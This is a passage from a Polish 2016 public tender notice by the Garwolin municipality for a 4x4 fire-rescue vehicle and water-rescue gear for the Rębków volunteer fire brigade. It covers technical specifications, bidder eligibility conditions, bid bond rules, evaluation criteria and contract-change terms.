3.28	Samochód wyposażony w wysokociśnieniową linię szybkiego natarcia o długości węża min. 60 m, umieszczoną na zwijadle, zakończoną prądownicą wodno-pianową o regulowanej wydajności, umożliwiającą podawanie zwartego i  rozproszonego strumienia wody oraz piany. Linia szybkiego natarcia  umożliwia podawanie wody lub piany z prądownicy bez względu na stopień rozwinięcia węża. Zwijadło  wyposażone w  napęd elektryczny                   i ręczny. Szybkie natarcie wyposażone w pneumatyczny system odwadniania, umożliwiający opróżnienie  linii przy użyciu sprężonego powietrza.  Linia szybkiego natarcia umiejscowiona w trzeciej skrytce  po prawej stronie auta.
3.29	Instalacja układu zraszaczy zasilanych od autopompy:
	min. 4 dysze do podawania wody w czasie jazdy, 
	dwa zraszacze zamontowane przed przednią osią,
	dwa zraszacze zamontowane po bokach pojazdu.
Instalacja powinna być wyposażona w zawory odcinające (jeden dla zraszaczy przednich, drugi dla zraszaczy bocznych). Montaż sterowania zraszaczami z kabiny kierowcy.
3.30	Pojazd  wyposażony w wysuwany maszt oświetleniowy z głowicą z co najmniej 2 (dwoma) reflektorami, wyposażonymi w  lampy  LED o  strumieniu świetlnym  min.15 000 lumenów każdy, zasilany z instalacji elektrycznej pojazdu napięciem 24V, wyposażone w soczewki zapewniające szerokie rozproszenie światła: 
	wysokość rozłożonego masztu, mierzona od podłoża do oprawy reflektorów  min. 4,5 metrów,
	obrót i pochył reflektorów, o kąt co najmniej od 0 ÷ 135 w obie strony,
	sterowanie masztem odbywa się z poziomu ziemi, za pomocą manipulatora przewodowego
	złożenie masztu następuje, bez konieczności ręcznego wspomagania, 
	w kabinie  znajduje się sygnalizacja informująca o wysunięciu masztu, 
	wysunięcie masztu następuje tylko na postoju po zaciągnięciu hamulca ręcznego,
	wymagana możliwość sterowania masztem na różnej wysokości wysuwu,
	wysuw masztu  realizowany z instalacji pneumatycznej samochodu,
IV.	                           WYPOSAŻENIE
4.1	Pojazd wyposażony w sprzęt  standardowy, dostarczany z podwoziem min.: 
2 klin, klucz do kół, podnośnik hydrauliczny z dźwignią, trójkąt ostrzegawczy, apteczka, gaśnica,  wspornik  zabezpieczenia podnoszonej kabiny, koło zapasowe. 
4.2	Na pojeździe zapewnione miejsce na przewożenie sprzętu zgodnie z Wymaganiami dla samochodów ratowniczo-gaśniczych.
Szczegóły dotyczące rozmieszczenia sprzętu do uzgodnienia z użytkownikiem na etapie realizacji zamówienia. Zamawiający na etapie wykonania dostarczy wykaz wraz z posiadanym sprzętem do zamontowania. Montaż sprzętu na koszt wykonawcy.
4.3	Samochód należy doposażyć w:
	z przodu pojazdu montaż wyciągarki elektrycznej o sile uciągu minimum - 9 ton z liną o długości min. 28 m, wraz z pokrowcem. Sterowanie wciągarki z pulpitu bezprzewodowego i przewodowego,
	 4 szt. latarek kątowych typu Ex z ładowarkami + 2 szt. dodatkowe ładowarki do latarek,
	 4 szt. radiotelefonów przenośnych z ładowarkami 12/230 V w zakresie częstotliwości VHF 136  174 MHz moc 1  5 W, odstęp międzykanałowy 12,5 kHz. +  2 szt. dodatkowe ładowarki do radiotelefonów 12/230 V, zamontowane w kabinie na specjalnym podeście.
	Agregat prądotwórczy
- moc maksymalna 2,6 kW
- moc nominalna 2,1 kW
- gniazda AC 2 x 230 V 16 A
- LWA /Stopień ochrony 96dB(A) / IP23
- Rodzaj silnika benzyna 
- Rozruch-ręczny
- Zbiornik paliwa 3,3l (+/- 0,2l)

4.4	Pojazd  wyposażony w:
	Hak kulowy do holowania przyczep o DMC maksymalnie 750kg. Montaż haka w taki sposób aby spełniał zapisy holowania na szosie i zapisy holowania w terenie z kątami zejścia min. 23°.  Z gniazdem przyłączeniowym 12 V. Sposób rozwiązania pozostaje w gestii Wykonawcy. 
	Szekle z przodu i z tyłu pojazdu po dwie szt.
	zbiornik paliwa samochodu zatankowany do pełna.
V.	                            OZNACZENIE
5.1	Wykonanie napisów na owiewce zabudowy OSP RĘBKÓW, oznakowania numerami operacyjnymi zgodnie z obowiązującymi wymogami KG PSP 429-01
VI.	                                 OGÓLNE
6.1	Gwarancja: 
Na podwozie samochodu min. 24 miesiące od daty wystawienia faktury
Na nadwozie pożarnicze min. 24 miesiące od daty wystawienia faktury          
6.2	W terminie odbioru technicznego  jakościowego należy dostarczyć:
- rysunki (zdjęcia) poglądowe, z wymiarami pojazdu (boki, przód, tył oraz dach),
- schemat układu wodno-pianowego.
6.3	W terminie odbioru techniczno  jakościowego należy dostarczyć instrukcje obsługi pojazdu, urządzeń i sprzętu zamontowanego w pojeździe w języku polskim, przeprowadzić test oraz szkolenie serwisowe w zakresie obsługi i konserwacji pojazdu.
6.4	min. 1 punkt serwisowy na terenie RP wykonujących wszystkie naprawy nadwozia 
min. 3 punkty serwisowe podwozia na terenie RP.
I.	Skafandry ratownicze  4 szt
		Całość wykonana z materiału wodoszczelnego - nylon laminowany od spodu poliuretanem tzw. dwuluminat.
	Gramatura tkaniny min:    185g/m2
	Odporność na rozerwanie min:    Osnowa: 850N Wątek:1200N
	Odporność na rozdarcie min.    Osnowa: 20N Wątek: 20N
	Odporność na zimno: min.   -30 st.C
	Odporność na gorąco:  +65 st.C
	wejściowy zamek gazoszczelny TIZIP na plecach  chroniony patką zamykaną na rzep
	zamek krótki gazoszczelny TIZIP (zamek ulgi) z przodu, chroniony patką zamykaną  na rzep
	rękawy zakończone zewnętrznymi mankietami zamykanymi na krótki zamek plastikowy YKK  oraz zintegrowanymi butelkowymi kryzami lateksowymi
	kryza szyjna lateksowa oraz docieplający kołnierz neoprenowy zamykany na rzep.
	jedna kieszeń "cargo" na prawej nogawce na wysokości uda
	wzmocnienia z tkaniny zasadniczej na pośladkach i kolanach
	regulowane szelki wewnętrzne
	taśmy odblaskowe Solas na rękawach i nogawkach + napis: STRAŻ POŻARNA na plecach.
	buty zintegrowane ze skafandrem
	widzialność skafandra dzięki kolorowi czerwonemu oraz taśmom odblaskowym
II.	Kamizelki asekuracyjne  4 szt
		kamizelka powinna posiadać wyporność min.80N
	 wykonana z tkaniny odpornej na przetarcia oraz odbarwienia; 
	 zapinana na szeroki zamek umożliwiający zapięcie w rękawicy 
	 posiadać kieszenie 3 przednie  zapinane na rzep
	 posiadać mocowanie na radiotelefon nóż  ratowniczy  oraz  gwizdek 
	posiadać pasy kroczne uniemożliwiające wysunięcie się z kamizelki
	 posiadać kolor czerwony z elementami odblaskowymi
III.	Rzutka ratownicza  2 szt
		powinna posiadać pokrowiec w którym  umieszczony jest pływak
	lina pływająca o średnicy 6mm
	długość  liny min 25m
	pokrowiec z elementami odblaskowymi
IV.	Koło ratunkowe  1 szt
		koło wykonane z tworzywa sztucznego
	kolor pomarańczowy z elementami odblaskowymi
	w koło umocowana linka pochwytowa
V.	Linia ratownicza na bębnie 50 m  1 szt
		min. średnica 6 mm
	zakończona szelkami
	zwijana na bębnie
	pleciona
Podane w opisach nazwy własne nie mają na celu naruszenia art. 7 oraz art. 29 UPZP, a mają jedynie za zadanie sprecyzować oczekiwania jakościowe Zamawiającego.
Zamawiający dopuszcza rozwiązania równoważne pod warunkiem spełniania tego samego poziomu jakościowego, merytorycznego oraz gwarantujące taką samą
funkcjonalność jak produkty opisane w przedmiocie zamówienia.
Zamawiający dopuszcza możliwość składania ofert równoważnych w każdym przypadku przedmiotu zamówienia. Przez ofertę równoważną należy rozumieć ofertę,
która zawiera przedmiot zamówienia o takich samych parametrach lub lepszych od rozwiązań/produktów, które zostały przedstawione w tabeli, ale jest oznaczony
innym znakiem towarowym, patentem lub pochodzeniem. W przypadku zaoferowania rozwiązania/produktu równoważnego, na Wykonawcy spoczywa obowiązek
udowodnienia zachowania cech określonych przez zamawiającego rozwiązań/produktów. W przeprowadzonym dowodzie należy odnieść się do norm, parametrów
oraz standardów i dokonać porównania z rozwiązaniami/produktami wskazanym przez zamawiającego. Z porównania musi jednoznacznie wynikać, iż
rozwiązanie/produkt oferowany jako równoważny jest identyczny lub lepszy od rozwiązania/produktu wskazanego przez Zamawiającego. W tym celu Wykonawca
powinien precyzyjnie wyspecyfikować - w dokumentach załączonych do oferty - nazwę rozwiązania/produktu, producenta oraz załączyć do oferty foldery,
specyfikacje techniczne oferowanych rozwiązań/produktów, aprobaty techniczne oraz inne dokumenty zawierające dane techniczne oferowanych rozwiązań/
produktów. Brak jakichkolwiek informacji o ofercie równoważnej oznaczać będzie, że Wykonawca oferuje rozwiązania/produkty według wymagań Zamawiającego przedstawionych w SIWZ.  

<br /><br /><b>II.5) Główny kod CPV: </b>34144210-3<br /><b> Dodatkowe kody CPV:</b>35110000-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/11/2016<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Dostawa samochód ratowniczo - gaśniczego do 30.11.2016 r.
Dostawa sprzętu pożarniczego do 31.10.2016 r.</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający odstępuje od sposobu dokonywania oceny spełnienia warunku tym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający uzna, że Wykonawca spełnia warunek udziału w postępowaniu, jeżeli wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem zamówienia na wartość co najmniej 600.000,00 zł.  Ocena sposobu spełnienia w/w warunków zostanie dokonana zgodnie z formułą spełni nie spełnia w oparciu o treść dokumentów i oświadczeń dołączanych do oferty przez Wykonawcę a wymaganych przez Zamawiającego<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający uzna, iż Wykonawca spełnia warunek udziału w postępowaniu, jeżeli wykaże posiadanie wiedzy i doświadczenia w zakresie niezbędnym do wykazania spełnienia warunku, tj. przedstawi co najmniej dwie dostawy odpowiadające swoim rodzajem i wartością dostawie stanowiącej przedmiot zamówienia, polegające na dostawie samochodu pożarniczego z napędem 4x4 na kwotę nie mniejszą niż 600.000,00 zł brutto każda. Wykonawca zobowiązany jest do załączenia dowodów potwierdzających, ze dostawy te zostały wykonane należycie.Ocena sposobu spełnienia w/w warunków zostanie dokonana zgodnie z formułą spełni nie spełnia w oparciu o treść dokumentów i oświadczeń dołączanych do oferty przez Wykonawcę a wymaganych przez Zamawiającego<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">
1)Aktualne na dzień składania ofert Oświadczenie, stanowiące wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu  Załącznik nr 3 do SIWZ. 2.Zamawiający, w celu potwierdzenia okoliczności, o których mowa w art. 25 ust. 1 oraz informacji zawartych w Oświadczeniu będzie żądał (od Wykonawców, podwykonawców, podmiotów trzecich) złożenia następujących aktualnych dokumentów: W celu wykazania brak podstaw do wykluczenia: a)	Odpisu z właściwego rejestru lub z centralnej ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy. 
W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składa każdy z Wykonawców oddzielnie.
b)	Aktualne zaświadczenie z właściwego Urzędu Skarbowego, potwierdzające, że Wykonawca nie zalega z zapłatą podatku z wyjątkiem przypadku, kiedy uzyskał on przewidzianą prawem zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego  wystawione nie wcześniej niż 3 miesiące przed terminem składania ofert.
W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składa każdy z Wykonawców oddzielnie.
c)	Zaświadczenie właściwego Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub potwierdzenie, że Wykonawca uzyskał przewidzianą prawem zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu  wystawione nie wcześniej niż 3 miesiące przed terminem składania ofert.
W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składa każdy z Wykonawców oddzielnie.
 2)oświadczenia wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej; w przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu

</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1. Wykaz dostaw lub usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postepowaniu, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie. Zamawiający wymaga, aby Wykonawca wykazał się realizacją co najmniej dwóch dostaw polegających na dostawie samochodu pożarniczego z napędem 4x4 na kwotę nie mniejszą niż 600.000,00 zł brutto każda- wypełniony wg wzoru ustalonego załącznikiem nr 5 SIWZ. 
Zamawiający wymaga, aby usługi te były udokumentowane listami referencyjnymi, bądź inne dokumenty wystawione przez podmiot , na rzecz którego dostawy były wykonywane (oryginały lub kopie potwierdzone za zgodność z oryginałem przez osobę uprawnioną)
W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składa przynajmniej jeden z Wykonawców. 

2. Opłacona polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie mniejszą niż 600.000,00 zł.
W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składa przynajmniej jeden z Wykonawców lub mogą złożyć jedna wspólną polisę potwierdzającą, ze wszyscy Wykonawcy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości nie mniejszej niż na kwotę nie mniejszą niż 600.000,00 zł.
W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składa przynajmniej jeden z Wykonawców. 	 


<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. wypełniony formularz ofertowy sporządzony z wykorzystaniem wzoru stanowiącego Załącznik nr 1 do SIWZ, zawierający w szczególności: wskazanie oferowanego przedmiotu zamówienia, łączną cenę ofertową brutto, zobowiązanie dotyczące terminu realizacji zamówienia, okresu gwarancji i warunków płatności, oświadczenie o okresie związania ofertą oraz o akceptacji wszystkich postanowień SIWZ i wzoru umowy bez zastrzeżeń, a także informację którą część zamówienia Wykonawca zamierza powierzyć Podwykonawcy; 
2. wypełniony Załącznik nr 6 do SIWZ;</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1) 	Wykonawca zobowiązany jest wnieść wadium w wysokości 15.000,00 PLN (słownie: piętnaście tysięcy złotych) przed upływem terminu składania ofert. 
2) 	Wadium może być wniesione w: 
a.	pieniądzu; 
b.	poręczeniach bankowych, lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
c.	gwarancjach bankowych; 
d.	gwarancjach ubezpieczeniowych; 
e.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.). 
3) 		Wadium w formie pieniądza należy wnieść przelewem na konto Gminy Garwolin w Banku Spółdzielczym w Garwolinie o Nr:  42 9210 0008 0000 0055 2000 0010 z dopiskiem na przelewie: Wadium w postępowaniu TIP.271.33.2016.
4)		Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na rachunku bankowym Zamawiającego, o którym mowa w pkt 5. 2) niniejszej SIWZ, przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert). 
5) 	Zamawiający zaleca, aby w przypadku wniesienia wadium w formie: 
a) pieniężnej  dokument potwierdzający dokonanie przelewu wadium został załączony do oferty; 
b) innej niż pieniądz  oryginał dokumentu został złożony w oddzielnej kopercie, a jego kopia w ofercie. 
6) 	Z treści gwarancji/poręczenia winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy PZP. 
7) 	Oferta Wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy zostanie odrzucona. 
8) 	Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania umowy określa ustawa PZP. 
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający dopuszcza zmiany umowy w zakresie:
a)	w przypadku obiektywnej niemożności zapewnienia wyposażenia samochodu odpowiadającego wymogom zawartym w załączniku nr 6 do umowy z powodu zakończenia produkcji lub niedostępności na rynku elementów wyposażenia po zawarciu umowy  dopuszcza się zmianę umowy w zakresie rodzaju, typu lub modelu wyposażenia pojazdu, pod warunkiem, że nowe wyposażenie będzie odpowiadało pod względem funkcjonalności wyposażeniu pierwotnemu a jego parametry pozostaną niezmienione lub będą lepsze od pierwotnego; 
b)	w przypadku zaproponowania przez Wykonawcę szczególnie uzasadnionej pod względem funkcjonalności, sprawności lub przeznaczenia albo wyposażenia przedmiotu umowy, zmiany rozwiązań konstrukcyjnych przedmiotu umowy w stosunku do koncepcji przedstawionej w ofercie  dopuszcza się zmianę umowy w zakresie zawartych w załączniku nr 6 rozwiązań konstrukcyjnych,
c)	w przypadku zmian korzystnych dla zmawiającego dopuszczalna jest zmiana umowy w zakresie obniżenia ceny lub wymogów zawartych w załączniku nr 6 do niniejszej umowy,
